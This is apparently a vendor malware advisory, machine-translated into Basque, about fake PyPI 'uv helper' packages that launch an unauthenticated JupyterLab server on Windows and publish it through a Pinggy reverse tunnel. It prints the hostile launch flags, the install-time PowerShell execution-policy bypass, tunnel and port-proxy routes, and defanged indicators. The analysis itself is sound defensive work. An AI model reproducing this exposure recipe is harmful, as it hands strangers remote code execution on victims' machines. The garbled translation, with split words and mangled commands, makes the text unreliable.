FauxUV: PyPI uv pakete faltsuek Jupyter webera irekitzen dute

FauxUV: Jupyter zerbitzari autentifikatu gabe bat internetera irekitzen duten PyPI uv laguntzaile faltsuak

TL; DR

PyPI pakete multzo batek izena hartu zuen uv, Rust-en oinarritutako Python pakete kudeatzaile azkarra eta oso ezaguna, uv laguntzaile gisa aurkezten dira. Ia ez dute benetako funtzionalitaterik eskaintzen. Horren ordez, Windows karga bat daramate, eusten diona... JupyterLab zerbitzaria autentifikazioa itzalita duela eta, bertsio berriagoetan, alderantzizko tunel baten bidez Interneteko publikoan argitaratzen du.

Hori da istorio osoa lerro bakarrean: tresna fidagarri baten izena amu gisa, eta JupyterLab urruneko kodea exekutatzeko motor gisa. Jupyter zerbitzari batek not batean idazten duzun edozein kode exekutatzen du.ebook zelula; token huts batekin abiarazitakoa eta sareko interfaze guztietara lotuta dagoena portura irits daitekeen edonork gidatu dezakeen interprete irekia da.

Klusterra honela jarraitzen dugu FauxUVAztertutako bi paketeak hauek dira moon-uv (0.0.1 – 0.0.16) eta my-magic-uv-helper (0.0.1), operadore berak argitaratua eta analisi unean PyPI-n martxan dagoena.

ekosistemaPyPI
Paketeakmoon-uv (0.0.1-0.0.16), my-magic-uv-helper (0.0.1)
Plataforma helburuWindows
Oinarrizko portaeraJupyterLab zerbitzari autentifikatu gabea, alderantzizko tunel baten bidez interneten argitaratua
Tresna legitimoak gaizki erabili dirauv, JupyterLab, cloudflared, Pinggy

Amua: dagoeneko konfiantza duzun izen bat

uv azken bi urteotan gehien instalatu den Python tresnetako bat da, beraz, "laguntzaile bat" uv"garatzaile batek bigarren pentsamendurik gabe instalatzen duen paketea da. FauxUV-ek bere sinesgarritasuna izen horretan jartzen du erabat. Paketeek biltzen dute benetako uv Astral-eko instalatzailea — kargako URLak benetako ostalari entzutetsuetara bideratzen dituzte — beraz, begirada azkar batek erreferentzia fidagarriak baino ez ditu ikusten. Paketeek ez dute benetan gehitzen uv funtzionaltasuna; izena da mozorro osoa.

JupyterLab RCE motor gisa

Kargaren erdigunea JupyterLab abiarazten duen abiarazle bat da, babes-hesi guztiak kenduta:

jupyter server --with jupyterlab   --ip=0.0.0.0            # listen on every interface   --ServerApp.token=""    # no password, no token   --allow_origin='*'      # accept cross-origin connections   --disable_check_xsrf    # allow a remote browser/WebSocket to drive it

Bandera bakoitzak babes bat kentzen du, eta bidalitako gidoiak ere oharrak egiten ditu (jatorrizko txineraz): token hutsa "Pasahitz eta token egiaztapenak desaktibatzen ditu — edonork konekta daiteke." jupyter laborategia datu-zientziarako IDE zilegi bat da, baina ez daebook gelaxkak kode arbitrarioa exekutatzen du diseinuz. Horrela konfiguratuta eta lotuta 0.0.0.0, IDE izateari uzten dio eta ostalariaren urruneko shell autentifikatu gabe bihurtzen da — ez da malware bitar pertsonalizaturik behar, bide okerrean zuzendutako tresna nagusi bat besterik ez.

Bi pieza euskarrik hori eskuragarri eta errepikagarria egiten dute:

  • Instalazio isilaren abiarazle bat. Lehen bertsioek PowerShell exekutatzen dute -Exekuzio-politikaren saihesbidea zuzenean konfigurazioa.py on pip instalatu, atzeko planoan erroreak ezabatuta, beraz PIP normala dirudi. Bertsio berriek primitibo bera mugitzen dute pip-uv komando-lerroko tresna — eta instalazio-garaiko auto-exekuzioa erabat kendu.
  • Alderantzizko tunel publikoa. Zerbitzari bat piztuta 0.0.0.0 makinara bidea egin dezaketen ostalarien bidez bakarrik lor daiteke oraindik. Multzo batek [Pinggy]( bat irekitzen duhttps://pinggy.io/) SSH alderantzizko tunela, Jupyter portu lokala helbide publiko batera birbidaltzen duena, muga hori kenduz. Bidalitako scriptak Cloudflare-ren bide alternatibo bat ere badu —komentatua— hodei-argia eta a netsh port-proxy bat Linode IP batera, helburu bera azpiegitura desberdinen bidez dokumentatuz.

Elkartuta: instalatu paketea, eta Windows ostalari batek pasahitzik gabeko JupyterLab bat exekutatzen eta Interneten argitaratzen amaitzen du.

Nola eboluzionatu zuen FauxUV-ak

FauxUV-en bertsioak bata bestearen atzetik bidali ziren, eta kargaren abiarazte-puntua haien gainetik mugitu zen — gogorarazten du markatutako bertsio batek gutxitan kontatzen duela pakete-lerro baten istorio osoa.

Praktikak Bertsioak trigger Zer gehitzen duen
Instalazio-amua moon-uv 0.0.1-0.0.3, my-magic-uv-helper 0.0.1 setup.py pip instalazioan uv instalazioa + PATH aurretik jarri
CLI exekuzio-denbora moon-uv 0.0.5-0.0.13 pip-uv komandoa pasahitzik gabeko JupyterLab abiarazlea
Tunela moon-uv 0.0.14-0.0.16 pip-uv komandoa Pinggy alderantzizko tunel aktibo bat

Azpimarratzekoa da instalazio-garaian auto-exekuzioa izan zela kendu bertsio berriagoetan, gaiagoetan — beraz, eskaner bat bizi-zikloan bakarrik tekleatzen zen hooks bertsio berrienak honela puntuatuko lituzke gutxiago arriskutsua, alderantziz, hain zuzen ere.

Konpromisoaren adierazleak

Paketearen iturburua irakurriz baieztatuta; amaiera-puntuak markatuta iruzkindu fitxategietan daude baina aztertutako bertsioak ez ditu exekutatzen. Sareko adierazleak desaktibatuta daude.

Mota Adierazlea
Instalatu komandoa powershell -ExecutionPolicy Bypass benetako uv instalatzailea eskuratzen, pip instalazio unean
JupyterLab banderak --ip=0.0.0.0 --ServerApp.token="" --allow_origin='*' --disable_check_xsrf
Alderantzizko tunela (aktibo) free[.]pinggy[.]io:443 tokiko birbidaltzea 127.0.0.1:8888
Tunelaren ostalaria (komentatua) cloudflared tunnel --url hxxp://127[.]0[.]0[.]1:2718
IP (komentatua) 45[.]79[.]134[.]161 (Linode) bidez netsh port-proxy
Iraunkortasuna aurretik jartzen da %USERPROFILE%\.local\bin erabiltzailearen BIDEA

Ohartarazi beharreko portaera-seinaleak, kate zehatz hauetatik independenteki: a pip instalatu sortzen dena. powershell -ExekuzioPolitika Saihestuedozein Jupiter abiaraztea konbinatzea tokena=”” batera –ip=0.0.0.0; eta irteerako SSH honetara *.pinggy.io garatzaile edo CI makina batetik.

Behatutako portaera eta jatorria

Bi paketeek egile eta metodo bat partekatzen dute: tresna fidagarri baten izena, Windows-erako soilik defentsa, erroreak kentzen dituen atzeko planoan exekuzioa eta tresna entzutetsuetan oinarritzea, beraz, begirada azkar batek URL entzutetsuak baino ez ditu ikusten. Iturriak segurtasunarekin lotutako banderak argi eta garbi deskribatzen dituzten txinerazko iruzkinak ditu; horiek fitxategian beha daitezkeen adierazpen gisa jakinarazten ditugu, ez motiboari buruzko baieztapen gisa. jatorri_baimendu balioa eta bat lankidetza.bat fitxategi-izenak Google Colab-erako erabiltzen diren "nire tokiko exekuzio-denbora partekatu" lan-fluxu informalak islatzen ditu. Jatorria edozein dela ere, paketatutako emaitza berdina da.

Eragina eta defendatzaileentzako orientabideak

Nor dago FauxUV-ren eraginpean? Windows garatzaileak eta CI exekutatzen dutenak pip instalatu pakete hauetako bat. JupyterLab pasahitzik gabeko bat 0.0.0.0 Portua irits daitekeen edonorentzat urruneko kodea exekutatzea da; tunelak "nork irits daitekeen" muga kentzen du. Zerbitzaria instalatzaile gisa exekutatzen da, erabiltzaile horren fitxategiak, tokenak eta hodeiko kredentzialak heredatuz.

Zergatik den erraza galtzea. Sare-kate guztiek ostalari entzutetsu batera seinalatzen dute — Astral, JupyterLab, hodei-argia, Pinggy, Colab. Ez dago hash egiteko malware bitarrik eta ez dago deskodifikatzeko blob nahasirik. Ospearen eta sinaduraren araberako eskaneatzeak garrantzi gutxi ematen dio horri, eta horregatik portaeraren galdera — Zer egiten du makinak pakete hau instalatzeak? — da harrapatzen duena.

Orientazio:

  • Tratatu edozein instalazio-denbora powershell -ExekuzioPolitika Saihestu eraikuntza-haustura seinale gisa, lortzen duen URLa edozein dela ere.
  • Alerta aktibatuta Jupiter token huts batekin abiarazi zen eta –ip=0.0.0.0; konbinazio hori ez da inoiz agertu behar lan-estazio edo exekutatzaile batean.
  • Tunel hornitzaileetara SSH irteerako monitorizazioa (*.pinggy.io, *.trycloudflare.com) garatzaile eta CI inguruneetatik.
  • Instalatu uv [iturri ofizialetik](https://docs.astral.sh/uv/) eta eszeptikoa izan instalatzeko erraza den tresna bat biltzen duten hirugarrenen "laguntzaile" paketeekiko.
  • Mendekotasunak eguneratutakoan finkatu eta berriro berrikusi — pakete-lerro batek bertsioz ​​bertsio gaitasun berriak haz ditzake.
sca-tools-software-konposizio-analisi-tresnak
Lehentasuna eman, konpondu eta babestu zure software arriskuak
Lortu zure doako kontua.
Ez da beharrezkoa kreditu txartelik.

Ziurtatu zure softwarearen garapena eta entrega

Xygeni produktu multzoarekin